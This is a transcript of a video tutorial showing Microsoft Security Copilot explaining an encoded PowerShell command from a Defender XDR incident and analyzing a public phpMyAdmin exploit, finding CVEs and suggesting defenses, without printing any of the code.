Analyze suspicious code with Microsoft Security Copilot - Microsoft Security Copilot Tutorial

- [Instructor] Security analysts need to deal with all kinds of suspicious codes. Let's see how Microsoft Security Copilot can help with that. Suspicious code analysis includes some common tasks, such as explain what the code does, investigate its security impact and related vulnerabilities, recommend actions to defend against the malicious code, write a code analysis report and share your findings with your team members. It's impossible for Security Analysts to know every programming language and system command. Also, examining a complex script with hundreds of lines takes a long time. This is why we need a Microsoft Security Copilot to work with us together. Now let's do a quick demo. Here's a sample incident in my Microsoft Defender XDR portal. Under attack story, click Suspicious PowerShell download or encoded command execution. I found a suspicious PowerShell script. Under the command line, I see a very long script and a part of it seems to be encoded by Base 64. Fortunately, we can click Analyze to let Security Copilot analyze it. Copilot summarized the script with a step-by-step explanation. This embedded script analysis function is very convenient for me during my incident investigation. I can also click More options than choose Open In Security Copilot. It'll take me to the Security Copilot's standalone portal, and I can continue my work there. Now let's start a new session to analyze another script. To find a sample script, I will go to the exploit database. Exploit database is a collection of public exploits used by many penetration testers and security researchers. I want to search for the exploits for phpMyAdmin. Let's select this exploit. I will copy the whole script. Go back to my Microsoft Security Copilot portal. This time, instead of entering my prompt, I will use a system capability, Analyze a script or command, paste the sample script and click wrong. Copilot provides a step-by-step breakdown of what the script does. To further investigate that script, I can enter show me the CVEs related to this script. Copilot found the CVE ID, and provided the details of the vulnerability. I can then ask a Copilot to recommend actions to defend against the script. Copilot suggested some actions, such as update php and MyAdmin to the latest version. Finally, I can share my findings with my colleagues. Click Share at the top right, add a name or email. Click send. Once my colleagues receive the invitation email, they can click View in Copilot link to access my shared session.